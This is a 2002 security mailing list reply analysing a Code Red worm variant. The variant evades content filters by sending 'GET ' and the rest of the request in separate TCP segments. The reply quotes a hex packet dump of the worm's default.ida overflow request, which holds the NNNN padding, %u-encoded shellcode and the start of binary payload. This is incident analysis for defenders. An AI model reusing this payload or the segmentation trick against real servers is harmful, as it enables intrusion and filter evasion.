Security Incidents mailing list archives

Re: new codered worm penetrates content-filtering

From: "Michael H. Warfield" <mhw () wittsend com>
Date: Thu, 10 Jan 2002 15:07:38 -0500

On Thu, Jan 10, 2002 at 01:18:36PM -0500, Chris Russel wrote:

For those who asked, here's a sample of the GET request packets.  With
normal codered (and any other web traffic) the GET would be in the same
packet as the URL since there is no reason to fragment.
Ironically, the Don't Fragment bit is set...


        And they are not fragmented.  They're being sent as two
separate IP datagrams, neither of which are fragmented [or you would
have a "(frag id:size@offset+)" field in your dump].

        Cute trick...  Means that this new varient is sending the
"GET " on the wire first with a "PUSH" (telling the underlying stack
to push out the data) and then sending the request in a separate call.

        Not a difficult trick at all.  Slides right past anything that
isn't doing full stream reassembly for content.  Anything that is only
doing IP datagram fragment reassembly or no reassembly will not see it.

08:05:00.285196 a.b.c.d.3237 > w.x.y.z.80: P 1:5(4) ack 1 win 16384 (DF)
payload:
0030                    47 45  54 20 00 00                     GE T ..

08:05:00.289638 a.b.c.d.3237 > w.x.y.z.80: P 5:513(508) ack 1 win 16384 (DF)
payload:
0030                    2f 64  65 66 61 75 6c 74 2e 69         /d efault.i
0040  64 61 3f 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   da?NNNNN NNNNNNNN
0050  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0060  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0070  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0080  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0090  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00a0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00b0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00c0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00d0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00e0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
00f0  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0100  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0110  4e 4e 4e 4e 4e 4e 4e 4e  4e 4e 4e 4e 4e 4e 4e 4e   NNNNNNNN NNNNNNNN
0120  4e 4e 4e 25 75 39 30 39  30 25 75 36 38 35 38 25   NNN%u909 0%u6858%
0130  75 63 62 64 33 25 75 37  38 30 31 25 75 39 30 39   ucbd3%u7 801%u909
0140  30 25 75 36 38 35 38 25  75 63 62 64 33 25 75 37   0%u6858% ucbd3%u7
0150  38 30 31 25 75 39 30 39  30 25 75 36 38 35 38 25   801%u909 0%u6858%
0160  75 63 62 64 33 25 75 37  38 30 31 25 75 39 30 39   ucbd3%u7 801%u909
0170  30 25 75 39 30 39 30 25  75 38 31 39 30 25 75 30   0%u9090% u8190%u0
0180  30 63 33 25 75 30 30 30  33 25 75 38 62 30 30 25   0c3%u000 3%u8b00%
0190  75 35 33 31 62 25 75 35  33 66 66 25 75 30 30 37   u531b%u5 3ff%u007
01a0  38 25 75 30 30 30 30 25  75 30 30 3d 61 20 20 48   8%u0000% u00=a  H
01b0  54 54 50 2f 31 2e 30 0d  0a 43 6f 6e 74 65 6e 74   TTP/1.0. .Content
01c0  2d 74 79 70 65 3a 20 74  65 78 74 2f 78 6d 6c 0a   -type: t ext/xml.
01d0  48 4f 53 54 3a 77 77 77  2e 77 6f 72 6d 2e 63 6f   HOST:www .worm.co
01e0  6d 0a 20 41 63 63 65 70  74 3a 20 2a 2f 2a 0a 43   m. Accep t: */*.C
01f0  6f 6e 74 65 6e 74 2d 6c  65 6e 67 74 68 3a 20 33   ontent-l ength: 3
0200  35 36 39 20 0d 0a 0d 0a  55 8b ec 81 ec 18 02 00   569 .... U.......
0210  00 53 56 57 8d bd e8 fd  ff ff b9 86 00 00 00 b8   .SVW.... ........
0220  cc cc cc cc f3 ab c7 85  70 fe ff ff 00 00 00 00   ........ p.......
0230  e9 0a                                              ..

-- 
Chris Russel     | CNS Information Security
russel () yorku ca  | York University, Toronto, Canada


        Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw () WittsEnd com
  /\/\|=mhw=|\/\/       |  (678) 463-0932   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

new codered worm penetrates content-filtering Chris Russel (Jan 10)
- Re: new codered worm penetrates content-filtering Ryan Russell (Jan 10)
- Re: new codered worm penetrates content-filtering Chris Russel (Jan 10)
  - Re: new codered worm penetrates content-filtering Michael H. Warfield (Jan 10)
- <Possible follow-ups>
- RE: new codered worm penetrates content-filtering Shackleford, Dave (Jan 10)
- RE: new codered worm penetrates content-filtering Robert Gile @Agoura (Jan 10)
- Re: new codered worm penetrates content-filtering Ryan Russell (Jan 10)
  - Re: new codered worm penetrates content-filtering Nick FitzGerald (Jan 11)
    - Re: new codered worm penetrates content-filtering Ryan Russell (Jan 11)
    - Re: new codered worm penetrates content-filtering Ryan Russell (Jan 11)